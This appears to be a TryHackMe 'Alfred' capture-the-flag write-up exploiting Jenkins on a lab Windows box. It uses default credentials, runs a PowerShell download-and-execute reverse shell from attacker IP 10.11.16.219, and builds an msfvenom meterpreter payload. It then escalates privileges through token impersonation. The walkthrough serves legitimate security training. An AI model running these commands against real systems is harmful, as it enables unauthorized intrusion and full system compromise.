TryHackMe — Alfred

7 min readJan 12, 2023

Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.

Overview:

This is a window-based machine with a difficulty level easy that revolves around Jenkins. According to Wikipedia, Jenkins is an open-source automation server. It helps automate the parts of software development related to building, testing, and deploying, facilitating continuous integration and delivery.

This box requires some enumeration about Jenkins. It is okay if you don’t have earlier experience with this technology, we will be going step by step. Without any further due, let's dive into the technicalities.

Enumeration:

Let's start with a nmap scan to find the open ports:

nmap -sC -sV -p- -A -T4 IP_ADDRESS -oN nmap_scan.txt

Output:

PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html).
3389/tcp open  ssl/ms-wbt-server?
|_ssl-date: 2023-01-09T14:27:07+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=alfred
| Not valid before: 2023-01-08T14:09:11
|_Not valid after:  2023-07-10T14:09:11
| rdp-ntlm-info: 
|   Target_Name: ALFRED
|   NetBIOS_Domain_Name: ALFRED
|   NetBIOS_Computer_Name: ALFRED
|   DNS_Domain_Name: alfred
|   DNS_Computer_Name: alfred
|   Product_Version: 6.1.7601
|_  System_Time: 2023-01-09T14:27:03+00:00
8080/tcp open  http               Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

From the above output, we conclude the following:

On port 80, there's a Microsoft web server running i.e. Microsoft IIS httpd 7.5 This version of Microsoft’s server is outdated & vulnerable and the TRACE method is enabled. On looking this into the browser, we got the following webpage:

On port 3389, we found lots of information about the victim machine i.e., target name, NetBIOS domain name, NetBIOS DNS name, and computer name. This information might be helpful in the future for framing an attack.
On port 8080, we found another web server running. On looking into the browser, we got the following webpage:

Since the room is based on Jenkins, this could be the starting point for further enumeration. Remembering the fundamentals, we should first try the default credentials i.e. admin:admin

Fortunately, these credentials worked and we logged in to the application.

Now, we can make ourselves familiar with this application. We need to find any option from where we can execute commands or upload a shell.

Exploitation:

As shown in Exhibit 5, we found an option to execute the windows batch command. Using this, we can get the reverse shell by using the Invoke-PowerShellTcp script. But before that, we have the challenge to transfer this script to the victim machine. The victim machine does not allow direct downloads from GitHub.

We will download this script into our local machine to overcome this challenge.

Now we need to start a python server on our local machine to host the script.

Our target is to transfer our script to the victim machine and execute it to get the reverse shell. To do that, we will download the script from the attacker’s machine and will trigger it to get the reverse shell. But before that, we need to start a netcat listener to get the reverse shell.

/* to download the Invoke-PowerShellTcp.ps1 */
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.16.219:9000/Invoke-PowerShellTcp.ps1')

/* to execute the above script */ 
Invoke-PowerShellTcp -Reverse -IPAddress 10.11.16.219 -Port 8000)

/* Run this command to download and then to execute the script */
powershell iex (New-Object Net.WebClient).DownloadString('http://10.11.16.219:9000/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 10.11.16.219 -Port 8000

where,

10.11.16.219 is the IP address of the attacker’s machine.

We will copy the last command of the code snippet and paste it into the “Execute Windows batch command” option as shown in Exhibit 5.

Click on “apply” and then “save”. After saving this, we should be redirected to the following screen.

Now we are good to go but before that make sure that your python server is up and your netcat listener is on too. Click on the “Build Now” option as highlighted in Exhibit 10. If the build got succeeded, we would get the shell as shown below:

Note: It might be possible that you won’t get the shell in your first attempt. In that case, you can try several times and if that doesn’t work too then you can try terminate the box and restart it. But don’t forget to change your IP in the payload.

We can explore the machine and get the user.txt flag.

Post Exploitation:

Now we need to escalate our privileges to get the root.txt flag. To accomplish the same, we will be switching our existing shell to a meterpreter because it provides more capabilities than the standard existing shell. We will do that in the following three steps:

Generating a payload.
Transferring the payload into the victim machine.
Triggering the payload.

Generating a payload:

Generating a payload using msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.11.16.219 LPORT=4444 -f exe -o reverse_shell.exe

Transferring the payload into the victim machine:

We will transfer our payload to the victim machine by pasting the following command in the previous shell that we got in Exhibit 11.

powershell "(New-Object System.net.WebClient).Downloadfile('https://10.11.16.219:9000/reverse_shell.exe', 'reverse_shell.exe')"

Triggering the payload:

Before executing the payload, we need to set up a listener in Metasploit.

After setting all the required options and run it to start the listener.

Now we can execute our payload at the victim machine.

We can see that we got the meterpreter shell with the same privileges as the previous shell i.e., bruce so we need to look for options to escalate our privileges. In our previous shell, check for what privilege options are enabled.

We will take advantage of SeImpersonatePrivilege to escalate privileges.

We will impersonate the “BUILTIN\Administrators” to get its privilege.

Even after having the “NT AUTHORITY\SYSTEM” privileges, we are unable to read the root.txt file. This is because we are using impersonated token but windows use the primary token to determine what a process can or cannot do. To read the root flag file, we need to migrate the process.